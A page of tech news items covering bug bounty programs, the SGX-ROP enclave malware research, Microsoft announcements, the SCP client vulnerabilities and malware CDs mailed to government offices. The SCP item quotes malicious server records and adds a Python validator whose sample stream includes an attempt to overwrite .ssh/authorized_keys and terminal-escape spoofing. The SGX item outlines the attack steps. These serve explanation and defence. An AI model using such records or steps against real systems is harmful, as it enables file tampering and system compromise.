To know more about privilege escalation and to learn other malware analysis methods, check out our course ‘Advanced Malware Analysis’, to which this video belongs.

EU to sponsor bug bounty programs for 14 open source projects from January 2019
Natasha Mathur
31 Dec 2018
2 min read
Julia Reda, member of the European Parliament, announced last week that the EU will fund bug bounty programs for 14 of the 15 selected open source projects, starting January 2019. Bug bounty programs reward friendly hackers who actively search for security vulnerabilities and issues. The program is managed by a group of volunteers selected from the security community. The size of a bounty depends on how severe the uncovered issue is and on the importance of the software, ranging from 25,000 euros all the way up to 89,000 euros.

The selected projects are:

Filezilla
Apache Kafka
Notepad++
PuTTY
VLC media player
FLUX TL
KeePass
7-zip
Digital Signature Services (DSS)
Drupal
GNU C Library (glibc)
The Symfony PHP framework
Apache Tomcat
WSO2
MidPoint

The EU is sponsoring the bug bounties as part of the third edition of its Free and Open Source Software Audit project (FOSSA). Reda mentions that the FOSSA project, started in 2015, was an initiative to promote free and open source software. “In 2014, security vulnerabilities were found in important Free Software projects. One of the issues was found in the Open Source encryption library OpenSSL. The issue made lots of people realize how important Free and Open Source Software is for the integrity and reliability of the Internet and other infrastructure”, mentions Reda.

Anyone can contribute by analyzing the listed software and submitting the bugs or issues they find on the bug bounty platforms HackerOne and Intigriti/Deloitte. For more information, check out Julia Reda’s official blog post.

Researchers prove that Intel SGX and TSX can hide malware from antivirus software

Melisha Dsouza
13 Feb 2019
4 min read
Researchers Michael Schwarz, Samuel Weiser, and Daniel Gruss from Graz University of Technology have published a research paper demonstrating how Intel SGX can itself pose a security threat. SGX (Software Guard eXtensions) allows malicious code to run on a system in a way that cannot be identified or analyzed by antivirus software. SGX allows programs to establish protected enclaves for code and data, where no other program on the system can spy on or tamper with them. The contents of an enclave are encrypted when written to RAM and decrypted when read, and the processor does not allow code from outside the enclave to access the enclave’s memory. The researchers used this model to examine what happens if the code inside the enclave itself is malicious. Because SGX is designed so that antimalware software cannot inspect enclave contents, it cannot detect malware running there, which makes enclaves a convenient spot for planting malicious code. The researchers demonstrated this with an SGX-ROP attack that uses a Transactional Synchronization eXtensions (TSX)-based memory disclosure primitive as part of the process. TSX was also part of the Meltdown attacks on Intel processors.

How does the attack take place?

According to the researchers, code in an enclave is quite restricted: it cannot make operating system calls, open files, read data from disk, or write to disk. All of these operations have to be performed from outside the enclave; only the encryption operation would occur within the enclave. That said, the enclave code can read and write anywhere in the unencrypted memory of its host process. To work within this model, the researchers used TSX, which provides a constrained form of transactional memory where a thread can modify several memory locations and then publish those modifications in one single atomic update.

The enclave uses this functionality to scan the memory of the host process for the components of its ROP payload and for somewhere to write that payload. It then redirects the processor to run the payload, which can mark a section of memory as executable so the malware can place its own supporting functions somewhere it can reach.

What's more?

The critical encryption takes place inside the enclave, making it impossible to extract the encryption key or even analyze the malware to find out which algorithm it uses to encrypt the data. Note also that the malware is not constrained by the enclave: it can subvert the host application to access operating system APIs, opening the way to attacks such as ransomware-style encryption of a victim's files.

This is what an Intel spokesperson replied to ZDNet in an email: “Intel is aware of this research which is based upon assumptions that are outside the threat model for Intel® SGX. The value of Intel SGX is to execute code in a protected enclave; however, Intel SGX does not guarantee that the code executed in the enclave is from a trusted source. In all cases, we recommend utilizing programs, files, apps, and plugins from trusted sources. Protecting customers continues to be a critical priority for us, and we would like to thank Michael Schwarz, Samuel Weiser, and Daniel Gruss for their ongoing research and for working with Intel on coordinated vulnerability disclosure”.

The research paper outlines 4 simple steps required to perform the attack:
1. The malicious enclave scans the host application for usable ROP gadgets using the read primitive.
2. The enclave identifies writable memory caves through the write primitive and injects the arbitrary malicious payload into those caves.
3. The enclave uses the gadgets identified in step 1 to construct a ROP chain and injects it into the application stack.
4. The enclave returns execution to the host application.

Once the application hits the ROP chain on the stack, the actual exploitation starts. The ROP chain runs with host privileges, and the attacker can then issue arbitrary system calls to compromise the system. You can head over to the research paper to learn more about the methodology the researchers followed for this attack.


Microsoft announces: Microsoft Defender ATP for Mac, a fully automated DNA data storage, and revived office assistant Clippy

Natasha Mathur
22 Mar 2019
4 min read
Microsoft made a series of new announcements earlier this week. These include a new Microsoft Defender ATP for Mac, the first fully automated DNA data storage system, and the revived Microsoft Office Assistant, Clippy.

Microsoft Defender ATP for Mac

The Microsoft team announced yesterday that it is expanding the reach of the core components of its security platform (including the new Threat & Vulnerability Management) to Mac devices. The unified endpoint security platform has also been renamed from Windows Defender ATP to Microsoft Defender ATP (Advanced Threat Protection), reflecting its new cross-platform nature. “We’ve been working closely with industry partners to enable Windows Defender Advanced Threat Protection (ATP) customers to protect their non-Windows devices while keeping a centralized “single pane of glass” experience”, states the Microsoft team. Users can install the Microsoft Defender ATP client on devices running macOS Mojave, macOS High Sierra, or macOS Sierra to manage and protect these devices. The app offers next-gen anti-malware protection and lets users review and configure their protection. Users can also configure advanced settings, including enabling or disabling real-time protection, cloud-delivered protection, and automatic sample submission, among others. Moreover, devices with alerts and detections are surfaced in the Microsoft Defender ATP portal, where security analysts and admins can review the alerts raised on Mac devices. The Microsoft team also plans to add Microsoft Intune support in the future, which would let users configure and deploy the settings via alternative Mac and MDM management tools such as JAMF.

Fully automated DNA data storage system

Microsoft announced the first fully automated DNA data storage system yesterday. The system allows the storage and retrieval of data in manufactured DNA. This move is aimed at moving DNA storage technology out of the research lab and into commercial data centers, says the Microsoft team. The team (Microsoft researchers and the University of Washington) successfully encoded the word “hello” in snippets of fabricated DNA and then converted it back to digital data with the help of a fully automated end-to-end system. The system uses software developed by the Microsoft and UW team to convert the ones and zeros of digital data into the As, Ts, Cs, and Gs (the building blocks of DNA). It then uses inexpensive, ‘off-the-shelf’ lab equipment to move the necessary liquids and chemicals into a synthesizer, which builds the manufactured snippets of DNA and pushes them into a storage vessel. To retrieve the information, the system adds other chemicals to prepare the DNA and uses microfluidic pumps to push the liquids into other parts of the system, which then “reads” the DNA sequences and converts them back into information a computer can understand. According to the researchers, “the goal of the project was not to prove how fast or inexpensively the system could work, but simply to demonstrate that automation is possible”.

Revived Office Assistant Clippy

Microsoft revived its 90s Office Assistant, Clippy, on Tuesday earlier this week. The Microsoft Office team brought Clippy back as an app offering animated Clippy stickers for chats in Microsoft Teams, the company’s group chat software. The Clippy stickers were also released on Microsoft’s official Office developer GitHub page, allowing all Microsoft Teams users to import and use them for free. However, Clippy was removed again the next day because the “brand police” within Microsoft were not happy with its reappearance in Microsoft Teams, reports The Verge. The associated GitHub project has also been removed. Clippy fans, however, are not happy with the company’s decision and have started a thread requesting that Microsoft bring Clippy back to Microsoft Teams.


Hyatt Hotels launches public bug bounty program with HackerOne

Natasha Mathur
11 Jan 2019
3 min read
Hyatt Hotels Corporation launched a bug bounty program with HackerOne earlier this week. As part of the program, ethical hackers are invited to test Hyatt websites and apps to spot potential vulnerabilities. “At Hyatt, protecting guest and customer information is our top priority and launching this program represents an important step that furthers our goal of keeping our guests safe every day,” stated Hyatt Chief Information Security Officer Benjamin Vaughn. Hyatt Hotels Corporation is headquartered in Chicago and is a leading global hospitality company with a portfolio of 14 premier brands, comprising more than 750 properties in more than 55 countries across six continents. Hyatt chose the HackerOne bug bounty program after conducting a deep review of the bug bounty marketplace. HackerOne's bug bounty programs reward friendly hackers who help discover security vulnerabilities in important software on the internet. Hyatt is the first in the hotel industry to launch a bug bounty program. “By being the first organization in the hospitality industry to embrace the collaborative efforts of global security researchers, Hyatt hopes to continue to raise its already high level of security standards as well as learn from and collaborate with security researchers”, stated the Hyatt team.

The bug bounty program Hyatt launched with HackerOne was originally an invite-only private program, in which it paid hackers about $5600 in bounties (bug bounty rewards). The program is now public. Hackers may search for vulnerabilities on the hyatt.com domain, www.hyatt.com, m.hyatt.com, world.hyatt.com, and on Hyatt’s mobile apps for iOS and Android. The company will pay hackers $4000 for critical vulnerabilities and $300 for low severity issues. The company will reward hackers for reporting vulnerabilities such as novel origin IP address discovery, authentication bypass, back-end system access via front-end systems, business logic bypass, container escape, SQL injection, cross-site request forgery, exploitable cross-site scripting, and WAF bypass, among other issues. “Bug bounty programs are a proven method for advancing an organization’s cybersecurity defenses. In today’s connected society, vulnerabilities will always be present. Organizations like Hyatt are leading the way by taking this essential step to secure the data they are trusted to hold”, said HackerOne CEO Marten Mickos.

35-year-old vulnerabilities in SCP client discovered by F-Secure researcher

Amrata Joshi
16 Jan 2019
4 min read
Yesterday, Harry Sintonen, a researcher at F-Secure, disclosed 35-year-old vulnerabilities in SCP (Secure Copy Protocol) clients. SCP is a network protocol that uses Secure Shell (SSH) to transfer data between hosts on a network. The affected SCP clients are susceptible to a malicious SCP server, which can make unauthorized changes to the target directory. In 2000, a directory traversal bug was found in the SCP client in SSH and fixed at the time.

Vulnerabilities discovered

One of the vulnerabilities lets an attacker write arbitrary malicious files to the target directory on the client machine; the attacker can also change the permissions on the directory to allow further compromises. Another vulnerability is that SCP clients fail to verify that the object returned after a download request is the one that was requested. The consequences are severe, as an attacker who controls the server can easily drop arbitrary files into the directory from which the user runs SCP (similar to a man-in-the-middle attack).

The major vulnerabilities discovered are:
- CWE-20: SCP client improper directory name validation [CVE-2018-20685]. Using an empty ("D0777 0 \n") or dot ("D0777 0 .\n") directory name, the server can make the SCP client modify the permissions of the target directory.
- CWE-20: SCP client missing received object name validation [CVE-2019-6111]. Since the SCP implementation is derived from the 1983 rcp(1), the server chooses which files and directories are sent to the client. According to Sintonen's post, “A malicious SCP server can overwrite arbitrary files in the SCP client target directory. If recursive operation (-r) is performed, the server can manipulate subdirectories as well (for example overwrite .ssh/authorized_keys).” This vulnerability is tracked as CVE-2018-20684 in WinSCP.
- CWE-451: SCP client spoofing via object name [CVE-2019-6109]. Because the progress display does not encode characters in the object name, the object name can be used to manipulate the client output, for example by employing ANSI codes to hide additional files being transferred.
- CWE-451: SCP client spoofing via stderr [CVE-2019-6110]. A malicious server can manipulate the client output, because the client accepts and displays arbitrary stderr output from the SCP server.

These vulnerabilities affect the SCP client implementations in Red Hat, Debian, and SUSE Linux, OpenSSH version 7.9 and earlier, and a few versions of WinSCP.

How to overcome these vulnerabilities?

For OpenSSH, users can switch to sftp or apply the https://sintonen.fi/advisories/scp-name-validator.patch to harden scp against server-side manipulation attempts. A note by Sintonen: This patch may cause problems if the remote and local shells don't agree on the way glob() pattern matching works. YMMV. For WinSCP, upgrade to WinSCP 5.14 or a later version. There is no fix available for PuTTY yet, and users are refraining from using PuTTY. One user commented on Hacker News, “I strongly discourage anyone from using PuTTY, not for this reason, but for its weird and nonstandard handling of SSH keys.”

Users are now more skeptical about downloading and transferring their files over the network. Most of us rely heavily on SSH because we think it is secure and trusted, but should we continue trusting it? Is it advisable to trust blindly and not take preventive measures beforehand? One user commented on Hacker News, “We trust a lot of things, and maybe we shouldn't. I use SCP infrequently and on machines that I control, so that's a level of risk I'm comfortable with.” Another user commented on the Hacker News thread, “The argument that you trusted this server enough to connect to it and download a file, therefore you clearly should trust it enough to permit it to execute arbitrary executables on your machine, is false in both cases.” Another user advises accessing data offline by shutting down the instance and attaching its storage as secondary storage on another instance, and discarding that storage as soon as the work is done. The data can also be downloaded at the hypervisor level; another comment on Hacker News reads, “You can't physically access the disk, but you often can download a snapshot or disk image, which is created at the hypervisor level.” To know more about the vulnerabilities, check out Sintonen's advisory post.
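The missing client-side checks described above (empty or dot directory names, unrequested object names, and terminal escape sequences in names or stderr) can be illustrated with a small validator for the control records an scp client receives from the server. This is an added, constructed example, not code from Sintonen's advisory, his patch, or OpenSSH; the record format is the "C<mode> <size> <name>" / "D<mode> 0 <name>" layout shown in the advisory's examples, and the `requested` glob argument is an assumption about how the client remembers what the user asked for.

```python
import fnmatch
import re
from dataclasses import dataclass

# Constructed example, not code from the advisory or from any scp implementation.
# Names rejected outright: the empty and dot names from the CVE-2018-20685 examples.
_BAD_NAMES = {"", ".", ".."}
# ASCII control characters, including ESC (0x1b), which CVE-2019-6109 abuses.
_CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")
# CSI escape sequences such as "\x1b[2K" plus lone control characters
# (newline and tab excepted) that must not reach the terminal unfiltered.
_UNSAFE_OUTPUT = re.compile(r"\x1b\[[0-9;?]*[ -/]*[@-~]|[\x00-\x08\x0b-\x1f\x7f]")


@dataclass
class Record:
    kind: str   # 'C' = regular file, 'D' = directory
    mode: int   # permission bits, parsed from the octal field
    size: int   # byte count (0 for 'D' records)
    name: str   # single path component announced by the server


def parse_record(line: str) -> Record:
    """Parse a 'C<mode> <size> <name>' or 'D<mode> 0 <name>' control record;
    'E' (end of directory) and 'T' (timestamp) records are out of scope."""
    line = line.rstrip("\n")
    if not line or line[0] not in "CD":
        raise ValueError(f"unsupported record: {line!r}")
    fields = line[1:].split(" ", 2)
    if len(fields) != 3:
        raise ValueError(f"malformed record: {line!r}")
    mode, size, name = fields
    return Record(line[0], int(mode, 8), int(size), name)


def validate_name(name: str, requested: str) -> None:
    """Raise ValueError unless 'name' is a safe single path component that
    matches the glob the user asked for (the check missing in CVE-2019-6111)."""
    if name in _BAD_NAMES:
        raise ValueError("empty or dot name (CVE-2018-20685 pattern)")
    if "/" in name or "\\" in name:
        raise ValueError("path separator in name (traversal attempt)")
    if _CONTROL_CHARS.search(name):
        raise ValueError("control characters in name (display spoofing)")
    if not fnmatch.fnmatchcase(name, requested):
        raise ValueError(f"server sent {name!r}, client requested {requested!r}")


def sanitize_for_display(text: str) -> str:
    """Neutralise escape sequences in server-supplied stderr or progress text
    before printing it (the CVE-2019-6109 / CVE-2019-6110 spoofing channel)."""
    return _UNSAFE_OUTPUT.sub("?", text)


def check_transfer(lines, requested):
    """Split server records into accepted names and (record, reason) rejections."""
    accepted, rejected = [], []
    for line in lines:
        try:
            rec = parse_record(line)
            validate_name(rec.name, requested)
            accepted.append(rec.name)
        except ValueError as exc:
            rejected.append((line.rstrip("\n"), str(exc)))
    return accepted, rejected


if __name__ == "__main__":
    # Constructed server stream: one honest file followed by the advisory's attack patterns.
    stream = ["C0644 5 hello.txt\n", "D0777 0 \n", "D0777 0 .\n",
              "C0644 10 .ssh/authorized_keys\n", "C0644 3 \x1b[2Kevil\n"]
    ok, bad = check_transfer(stream, "hello.txt")
    print("accepted:", ok)
    print("rejected:", [(sanitize_for_display(r), why) for r, why in bad])
```

A real client additionally has to handle the `E` and `T` records and the data bytes that follow each `C` record; the point here is only that every name is checked before anything is written to the target directory.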


Chinese hackers use snail mails to send malware on board government PCs

Vijin Boricha
01 Aug 2018
3 min read
Recently, Cisco and Huawei faced major breaches of their routers, with attackers using two different bypass methods: hackers compromised Cisco routers through a backdoor, while Huawei was a victim of botnets. This year has been crucial for big players targeted by modern cyber attacks like Meltdown and Spectre. Who would have imagined a CD being the cause of a security breach in the year 2018? This time, however, the hackers have taken an old school approach, or perhaps one of the most unexpected methods of opening a backdoor to sensitive information. Packages with China postmarks have ended up at several local and state government offices. Each envelope contained a rambling letter and a small CD. The letter included lengthy paragraphs about fireworks, parades, and the film industry, but nothing in particular, while the CD contained a set of Word files carrying script-based malware. These scripts were meant to run when government officials opened the files on their computers, compromising that system. People usually end up making blunders when they are confused or curious, and the hackers knew exactly how to kick the victims' curiosity and confusion into high gear. So far, a State Department of Cultural Affairs, State Historical Societies, and State Archives have received these packages, addressed specifically to them. The MS-ISAC says that the CDs contained Mandarin-language Microsoft Word (.doc) files, a few of which include malicious Visual Basic scripts. It is not clear whether anyone was tricked into inserting the disk into a government system. It is common sense not to insert a random disk into your system, but that is not always what happens: in 2016, a study found that 50% of people plugged USB devices they found in public places into their systems.

The choice of government agencies receiving these packages looks quite strange, but maybe the hackers are looking to breach a system where they will not be detected easily, the perfect spot from which to quickly attack a bigger target. Human curiosity can lead to an invention or a disaster, but in the security chain humans are considered the most delicate link. It is obvious that one should not insert a random storage device into one's systems, but here the hackers have shelled out a little cash to target victims still using CD-ROMs in this modern age. Now the only thing state agencies can hope for is that no one accidentally, or out of curiosity, inserts disks or USB devices of unknown origin into government systems.